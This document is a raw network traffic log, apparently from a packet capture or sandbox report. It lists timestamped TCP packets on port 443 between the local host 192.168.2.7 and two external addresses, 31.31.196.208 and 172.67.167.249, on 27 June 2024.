Jun 27, 2024 05:58:34.307351112 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.307375908 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.307409048 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.307435989 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.307476997 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.313240051 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:34.313281059 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:34.313332081 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:34.313544035 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:34.313566923 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:34.343348026 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.343400955 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.343449116 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.343523026 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.343563080 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.343585968 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.371931076 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.371956110 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.372023106 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.372081041 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.372112989 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.372137070 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.374737024 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.374752045 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.374845982 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.374861956 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.374891996 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.374910116 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.374912977 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.374926090 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.374952078 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.374969006 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.375056028 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.375068903 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.375111103 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.375128031 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.375150919 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.375191927 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.375202894 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.375216007 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.375271082 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.375283957 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.375329018 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.375513077 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.375525951 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.375576973 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.375588894 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.375824928 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.404486895 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.404500961 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.404578924 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.404594898 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.404644012 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.442323923 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.442344904 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.442506075 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.442506075 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.442564964 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.442631006 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.522922993 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.522943974 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.522996902 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.523030996 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.523050070 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.523180962 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.601130962 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.601149082 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.601195097 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.601227999 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.601248026 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.601264954 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.662623882 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.662643909 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.662715912 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.662787914 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.662836075 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.662836075 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.709085941 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.709105968 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.709166050 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.709194899 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.709254980 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.743998051 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.744018078 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.744075060 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.744096041 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.744122982 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.744154930 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.774734020 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.774754047 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.774806023 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.774826050 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.774863958 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.774864912 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.799288034 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.799304962 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.799376011 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.799402952 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.799453974 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.820063114 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.820116043 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.820157051 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.820173979 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.820204020 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.820224047 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.838336945 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.838383913 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.838418961 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.838432074 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.838464022 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.838481903 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.851619005 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.851664066 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.851691961 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.851703882 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.851736069 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.851778030 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.862876892 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.862917900 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.862963915 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.862977982 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.863006115 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.863023043 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.872562885 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.872602940 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.872646093 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.872658968 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.872690916 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.872853041 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.881890059 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.881933928 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.881966114 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.881978989 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.882013083 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.882033110 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.888923883 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.888964891 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.888994932 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.889007092 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.889072895 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.889117002 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.895204067 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.895245075 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.895314932 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.895327091 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.895353079 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.895421028 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.901345015 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.901388884 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.901437998 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.901449919 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.901477098 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.901494026 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.906622887 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.906666040 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.906697035 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.906709909 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.906737089 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.906753063 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.911147118 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.911191940 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.911221981 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.911233902 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.911258936 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.911276102 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.915456057 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.915498972 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.915560007 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.915571928 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.915595055 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.915666103 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.919281960 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.919326067 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.919368982 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.919387102 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.919414043 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.919449091 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.923520088 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.923558950 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.923585892 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.923597097 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.923621893 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.923640966 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.926975965 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.927069902 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.927088976 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.927109957 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.927151918 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.927172899 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.930229902 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.930294037 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.930308104 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.930329084 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.930370092 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.930389881 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.933692932 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.933736086 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.933769941 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.933787107 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.933808088 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.933835983 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.936745882 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.936784029 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.936811924 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.936822891 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.936868906 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.936868906 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.939435005 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.939475060 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.939502954 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.939515114 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.939538956 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.939563990 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.942055941 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.942101002 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.942126036 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.942137003 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.942164898 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.942183971 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.942473888 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:34.942758083 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:34.942787886 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:34.943825006 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:34.943873882 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:34.944181919 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:34.944248915 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:34.944325924 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:34.945419073 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.945462942 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.945501089 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.945513010 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.945540905 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.945671082 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.947377920 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.947417974 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.947451115 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.947463036 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.947489023 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.947525978 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.949259996 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.949302912 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.949337006 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.949347019 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.949379921 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.949398994 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.951652050 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.951694965 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.951725006 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.951735020 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.951764107 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.951831102 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.953447104 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.953488111 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.953510046 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.953526974 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.953547955 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.953572035 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.955360889 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.955403090 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.955431938 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.955442905 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.955467939 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.955487013 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.957215071 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.957257986 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.957285881 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.957297087 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.957323074 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.957340002 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.959026098 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.959064960 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.959094048 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.959104061 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.959127903 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.959153891 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.960762978 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.960803986 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.960835934 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.960854053 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.960872889 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.960908890 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.962599039 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.962639093 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.962663889 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.962675095 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.962698936 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.962717056 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.964308023 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.964348078 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.964370966 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.964381933 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.964407921 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.964432955 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.966080904 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.966123104 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.966144085 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.966161013 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.966180086 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.966202974 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.967061996 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.967103004 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.967123985 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.967140913 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.967159033 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.967180014 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.968873978 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.968913078 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.968935966 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.968946934 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.968974113 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.968992949 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.969763994 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.969805956 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.969835043 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.969845057 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.969871044 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.969888926 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.971522093 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.971564054 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.971585035 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.971601963 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.971618891 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.971642971 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.972454071 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.972517967 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.972529888 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.972551107 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.972595930 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.972616911 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.974227905 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.974271059 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.974292994 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.974308014 CEST	443	49709	31.31.196.208	192.168.2.7
